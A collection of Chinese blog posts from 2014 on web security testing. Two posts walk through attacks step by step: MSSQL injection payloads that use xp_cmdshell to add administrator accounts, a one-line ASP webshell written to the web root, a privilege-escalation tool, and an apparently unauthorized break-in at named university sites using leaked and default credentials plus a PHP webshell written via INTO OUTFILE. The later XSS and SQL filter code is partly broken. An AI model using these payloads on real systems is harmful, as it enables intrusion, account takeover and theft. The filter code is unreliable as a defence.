　　Ps: CSS 绕过的方法，其实是很多的，一般我们可以根据后台的返回来通过不同的方法绕过进行测试

　　【SQL注入攻击】

　　相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

　　SQL注入:

　　还有所谓的命令注入：

　　三、常用WEB安全检测工具介绍

　　黑盒类测试工具：

　　三、安全测试包含内容

　　一般来说，80%的安全测试都包含在这里面了：

　　简单来看一下这类测试生成的测试报告，例如 acunetix web vulnerability scanner 工具扫描测试结果如下，我们可以针对不同等级的测试漏洞来选择性的进行关注或者手工验证尝试。

顺其自然EVO 2014-07-09 15:53 发表评论

记一次内网渗透测试经历

顺其自然EVO — Tue, 27 May 2014 02:06:00 GMT

　　话说刚开始接触安全测试时，没有一个系统的概念，前辈仍一个内网测试网站，让我把的shell拿下来，那我就开始吭哧吭哧的干起来。
　　首先，做渗透测试要有个思路，不能埋头苦干。所以就开始理了下思路，具体如下：
　　判断有无sql注入点，根据sql注入点来判断数据库类型，若是mssqlserver则查看存储过程xp_cmdshell 查看其是否被禁用，若没有被禁用，则直接在注入点后面直接使用xp_cmdshell 存储过程向系统中添加权限。
　　判断是否有上传漏洞，主要是上传asp等一句话脚本，先得到webshell，然后利用webshell再获取系统shell。
　　主要是利用sa，和第一种思路大致一样
　　主要就这几种思路，下面就开始实施。
　　首先，针对思路一：
　　既然是判断有无sql注入，最方便的方法当然是使用工具进行扫描，这里我使用的是webcruiser，一个非常小巧的工具，当然我这里肯定能够扫描出sql注入漏洞，接下来当然可以继续用这个工具得到数据库等信息，而我在这里就直接在该sql注入点是否能够执行xp_cmdshell。
　　具体方法是这样的：
　　确定数据库类型：
　　?Id=1234;and (select count(*) from sysobjects)>0
　　得到当前连接名和数据库名，查看是否为sa连接。
　　?id=1234;and user>0 (若显示dbo 则代表sa)。
　　?id=1234;and db_name()>0，执行异常时，可以得到当前连接的数据库名。
　　查看xp_cmdshell是否被禁用。
　　?id=1234;and (select count(*) from master.dbo.sysobjects where xtype=”X” and name =’xp_cmdshell’)
　　若存储过程被删掉，则尝试恢复。
　　?id=1234;and exec sp_addextendepro xp_cmdshell,’xplog70.dll’
　　若出现下面的错误，可以尝试如下方法：
　　l 无法装载 DLL xpsql70.dll 或该DLL 所引用的某一DLL。原因126 (找不到指定模块)。
　　首先执行，exec sp_dropextendeproc “xp_cmdshell” ,然后执行sp_addextendeproc “xp_cmdshell”,”xpsql70.dll”
　　l 无法再库xpweb70.dll 中找到函数xp_cmdshell 原因127
　　首先执行 exec sp_dropextendeproc “xp_cmdshell” ，然后执行 exec sp_addextendeproc “xp_cmdshell”,”xpweb70.dll”
　　则利用存储过程，执行添加用户的操作。
　　?id=1234 ;exec master..xp_cmdshell “net user aaa bbb /add ”-- 其中aaa为用户名，bbb为密码。
　　添加到管理员组：
　　?id=1234 ;exec master..xp_cmdshell “net localgroup administrators aaa/add ”
　　若想备份数据库，则采用：
　　?id=1234 ;exec backup database 数据库名 to disk =’C:\inetpub/wwwroot\save.db’，当然前提是知道web虚拟路径。
　　当然当知道web虚拟路径的时候，可以通过制造一个unicode 漏洞来完成对计算机的控制。
　　?id=1234;exec master..xp_cmdshell “copy c:\windows\system32\cmd.exe c:\inetpub\scripts\cmd.exe”
　　上面的主要是利用xp_cmdshell 方法来的，如果其中的方法不起作用，那就另当别论了。
针对思路二：

　　既然是通过上传一个文件，那么首先要做的工作就是找各种上传路径，在前台摸索了半天也没有找到一个可以上传的功能，而后使用后台上传功能，通过找各种后台，其中发现个admin这个后台，无奈，用户名和密码均无法通过验证，从数据库里面看，也没有相应的用户名和密码，所以这个后台基本上是个无效的后台，没办法，眼看着上传这条路就要失效了，此时我又使用了webcruiser 对整个网站扫描了下，发现该软件有cmd模式，而且能够执行成功，此时思路就来了，既然应用程序前后台均无法上传，何不在这里直接使用cmd命令来建立一个asp文件呢？当然前提是要知道web虚拟路径在哪里。

　　一般情况下，web虚拟路径通常是这样的：C:\inetpub\wwwroot ;D:\inetpub\wwwroot ;

　　或者E:\inetpub\wwwroot 等就这几个路径，而虚拟可以执行的目录一般是C:\inetpub\scripts ；D:\inetpub\scripts ; E:\inetpub\scripts

　　接下来，我在cmd命令下，直接执行一条命令：

　　echo ^<^%execute^(request^("eval"^)^)^%^> c:\inetpub\wwwroot\cms\test123456.asp

　　在这个目录下，生成了个一句话木马asp文件，然后再使用菜刀连接，ok，webshell拿到。

　　得到webshell 不是最主要的，而且webshell 也没有什么太大的作用，因此就尝试使用webshell往相应目录传送我们的攻击文件，尝试了几个目录均没有发现可以执行的目录，在快要放弃的情况下，然后尝试了C:\recycle这个目录，发现可以上传可以执行的文件，下面就简单了。

　　接下来的思路很简单，就是上传一个后面软件，执行系统权限添加操作。在做到过程中，还是遇到了不少困难，例如，开始上传的瑞士军刀，想通过反弹端口来执行我们添加用户的操作，发现无法成功。

　　在后来，通过一些0day的溢出漏洞来取得系统权限，在网上搜罗了一大堆的0day软件，均发现不可以利用，后来看到“巴西烤肉”这款软件，英文名Churraskito.exe，这款0day溢出软件是如此的强大，而且我下的这个还么有后门，直接执行Churraskito “C:\windows\system32\cmd.exe ” “net user 111 111/add”成功添加用户，哈哈，当然如果你想加到管理员组，在使用Churraskito “C:\windows\system32\cmd.exe ” “net localgroup administrators 111 /add” 基本上就ok了，至此，一个简单的获取系统权限的渗透测试就算完成了。

　　这里直接用webcruiser 中的cmd命令，直接执行添加用户操作就可以了，省去了后面的一系列操作。擦得，后来才想到的，唉。。。

　　思路三：

　　既然可以执行，未必非要xp_cmdshell ,我们可以通过尝试sa，这个操作，例如，先在数据库中建立一个用户，然后把该用户提升为sysadmin,之后在使用查询分析器连接，当然还是要使用xp_cmdshell 的存储过程。

　　具体方法如下：

　　首先建立数据库用户：

　　?id=1234;exec master.dbo.sp_addlogin user;

　　当然也可以为这个用户赋予密码，其实无所谓，如果赋予密码的话，这样操作：

　　?id=1234;exec master.dbo.password null ,password ,user;

　　这里的null就是旧密码，password 为新密码。

　　然后将该用户提升权限：

　　?id=1234;exec master.dbo.sp_addsrvrolemember user,sysadmin;

　　提升成功后，就可以通过查询分析器连接，连接成功后，直接查看xp_cmdshell是否能用；如果能用，则直接提升权限操作，；例如：

　　Xp_cmdshell ‘net user’

　　Xp_cmdshell ‘net user test123 test123 /add’

　　Xp_cmdshell ‘net localgroup administrators test123/add ’

　　Xp_cmdshell ‘net user test123 /del’

　　等。

　　开启telnet服务：

　　Xp_cmdshell ‘net start tlntsvr’

　　总结：

　　在这期间，我知道了webshell 和shell 不是一回事，也知道了xp_cmdshell是可以获取系统权限的，也知道了有些工具是可以执行cmd命令的，当然我也初步了解下瑞士军刀巴西烤肉等一系列攻击工具的用法，当然也了解到一些系统是可以被0day的。虽然这次渗透还有很多没有了解的地方，虽然只是大致的了解下，但是，对以后这方面，应该有个很好的思路以及借鉴。安全这块，任重而道远，以此勉励自己。

顺其自然EVO 2014-05-27 10:06 发表评论

渗透测试笔记

顺其自然EVO — Thu, 24 Apr 2014 02:21:00 GMT

今天朋友在入侵织梦的网站系统，通过最新的Exp获得了织梦后台的账号和密码

　　账号：admin

　　密码：abc123456

　　但是，找来找去找不到后台，就让我提权试试。

　　我看了下：http://pxc.ncist.edu.cn/dede/

　　后台被删除了！怎么办？？

　　google hack也没找到后台

　　后来，我试了试这个网站：http://zsjy.ncist.edu.cn/phpmyadmin

　　输入默认MySql账号与密码：

　　账号：root

　　密码：root

　　居然进去了：

　　接下来就是phpmyadmin提权了：

　　我的思路是：

　　1.先爆出php服务器www的路径

　　2.然后通过将php一句话插入数据库再导出到www路径

　　通过google hack爆到路径：D\www\

　　呵呵，接下来就执行sql语句：

CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );

INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('');

SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';

　　这段sql意思是：

　　1.在mysql数据库中建一张表叫xss，在xss表中生成一个field(字段)叫xss1

　　2.将php一句话木马插入数据库中的xss1字段处

　　3.将数据库中xss1字段的内容导出到d:\www\x.php文件中

　　这下，通过chopper连接x.php小马得到shell：

　接下来，上传一个php大马spider.php

　　通过FF连接spider.php:

　　成功获得webshell！！！

顺其自然EVO 2014-04-24 10:21 发表评论

过滤XSS攻击和SQL注入函数

顺其自然EVO — Wed, 09 Apr 2014 02:43:00 GMT

/**

+----------------------------------------------------------

* The goal of this function is to be a generic function that can be used to parse almost any input and * render it XSS safe. For more information on actual XSS attacks, check out http://ha.ckers.org/xss.html. * Another excellent site is the XSS Database which details each attack and how it works.

* XSS过滤

+----------------------------------------------------------

* @param mixed $value 变量

+----------------------------------------------------------

* @return mixed 过滤后的字符串

+----------------------------------------------------------

function RemoveXSS($val) {

// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed

// this prevents some character re-spacing such as

// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some // inputs

$val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);

// straight replacements, the user should never need these since they're normal characters

// this prevents like

$search = 'abcdefghijklmnopqrstuvwxyz';

$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

$search .= '1234567890!@#$%^&*()';

$search .= '~`";:?+/={}[]-_|\'\\';

for ($i = 0; $i < strlen($search); $i++) {

// ;? matches the ;, which is optional

// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars

// @ @ search for the hex values

$val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val);//with a ;

// @ @ 0{0,7} matches '0' zero to seven times

$val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;

}

// now the only remaining whitespace attacks are \t, \n, and \r

$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');

$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');

$ra = array_merge($ra1, $ra2);

$found = true; // keep replacing as long as the previous round replaced something

while ($found == true) {

$val_before = $val;

for ($i = 0; $i < sizeof($ra); $i++) {

$pattern = '/';

for ($j = 0; $j < strlen($ra[$i]); $j++) {

if ($j > 0) {

$pattern .= '(';

$pattern .= '(&#[xX]0{0,8}([9ab]);)';

$pattern .= '|';

$pattern .= '|(�{0,8}([9|10|13]);)';

$pattern .= ')*';

}

$pattern .= $ra[$i][$j];

}

$pattern .= '/i';

$replacement = substr($ra[$i], 0, 2).''.substr($ra[$i], 2); // add in <> to nerf the tag

$val = preg_replace($pattern, $replacement, $val); // filter out the hex tags

if ($val_before == $val) {

// no replacements were made, so exit the loop

$found = false;

}

return $val;

}

+----------------------------------------------------------

* 函数名称：inject_check()

+----------------------------------------------------------

* 函数作用：检测提交的值是不是含有SQL注射的字符，防止注射，保护服务器安全

+----------------------------------------------------------

* @param mixed $sql_str: 提交的变量

+----------------------------------------------------------

* @return mixed 返回检测结果，ture or false

+----------------------------------------------------------

function inject_check($sql_str) {

+----------------------------------------------------------

* 函数名称：escapeMysql()

* SQL注入主要是提交不安全的数据给数据库来达到攻击目的。为了防止SQL注入攻击，PHP自带一个功能可以对输入的字符串进行处理，可以在较底层对 * 输入进行安全上的初步处理，也即Magic Quotes。(php.ini magic_quotes_gpc)。如果magic_quotes_gpc选项启用，那么输入的字符串 * 中的单引号，双引号和其它一些字符前将会被自动加上反斜杠\。

* 但Magic Quotes并不是一个很通用的解决方案，没能屏蔽所有有潜在危险的字符，并且在许多服务器上Magic Quotes并没有被启用。所以，我们 * 还需要使用其它多种方法来防止SQL注入。许多数据库本身就提供这种输入数据处理功能。例如PHP的MySQL操作函数中有一个叫 * mysql_real_escape_string()的函数，可将特殊字符和可能引起数据库操作出错的字符转义。

+----------------------------------------------------------

* 函数作用：检测提交的值是不是含有SQL注射的字符，防止注射，保护服务器安全

+----------------------------------------------------------

* @param mixed $sql_str: 提交的变量

+----------------------------------------------------------

* @return mixed 返回检测结果，ture or false

+----------------------------------------------------------

function escapeMysql($el){

if(is_array($el))

{

return array_map("escapeMysql", $el );

}else{

/*如果Magic Quotes功用启用 */

if (!get_magic_quotes_gpc()) {

$el = mysql_real_escape_string(trim($el));

}

$el = str_ireplace("%5d%5c", "'", $el);

$el = str_replace("_", "\_", $el); // 把 '_'过滤掉

$el = str_replace("%", "\%", $el); // 把 '%'过滤掉

$el = nl2br($el); // 回车转换

return $el;

}

/**

+----------------------------------------------------------

* 变量过滤

+----------------------------------------------------------

* @param mixed $value 变量

+----------------------------------------------------------

* @return mixed

+----------------------------------------------------------

function var_filter_deep($value) {

return $value;

if(is_array($value))

{

return $value = array_map("var_filter_deep", $value );

}else{

$value = RemoveXSS($value);

//$value = inject_check($value);

$value = escapeMysql($value);

return $value;

}

+----------------------------------------------------------

* 函数名称：verify_id()

+----------------------------------------------------------

* 函数作用：校验提交的ID类值是否合法

+----------------------------------------------------------

* 参　　数：$id: 提交的ID值

+----------------------------------------------------------

* 返回值：返回处理后的ID

+----------------------------------------------------------

function verify_id($id=null) {

if (!$id) { exit('没有提交参数！'); } // 是否为空判断

elseif (inject_check($id)) { exit('提交的参数非法！'); } // 注射判断

elseif (!is_numeric($id)) { exit('提交的参数非法！'); } // 数字判断

$id = intval($id); // 整型化

return $id;

}

/**

+----------------------------------------------------------

* 变量安全过滤

+----------------------------------------------------------

* @static

* @access public

+----------------------------------------------------------

* @return string

+----------------------------------------------------------

function varFilter ()

{

$_SERVER = array_map( "var_filter_deep", $_SERVER );

$_REQUEST = array_map( "var_filter_deep", $_REQUEST);

$_POST = array_map( "var_filter_deep", $_POST );

$_GET = array_map( "var_filter_deep", $_GET );

$_COOKIE = array_map( "var_filter_deep", $_COOKIE );

//print_r($_POST);

}

顺其自然EVO 2014-04-09 10:43 发表评论

Web安全测试之XSS

顺其自然EVO — Tue, 11 Mar 2014 02:52:00 GMT

XSS 全称(Cross Site Scripting) 跨站脚本攻击，是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的. 比如获取用户的Cookie，导航到恶意网站,携带木马等。

　　作为测试人员，需要了解XSS的原理，攻击场景，如何修复。才能有效的防止XSS的发生。

　　XSS 是如何发生的呢

　　假如有下面一个textbox

　　value1from是来自用户的输入，如果用户不是输入value1from,而是输入 "/>

　　嵌入的JavaScript代码将会被执行

　　或者用户输入的是 "onfocus="alert(document.cookie) 那么就会变成

　　事件被触发的时候嵌入的JavaScript代码将会被执行

　　攻击的威力，取决于用户输入了什么样的脚本

　　当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图

　　HTML Encode

　　XSS之所以会发生，是因为用户输入的数据变成了代码。所以我们需要对用户输入的数据进行HTML Encode处理。将其中的"中括号"， “单引号”，“引号” 之类的特殊字符进行编码。

　　在C#中已经提供了现成的方法，只要调用HttpUtility.HtmlEncode("string ") 就可以了。（需要引用System.Web程序集）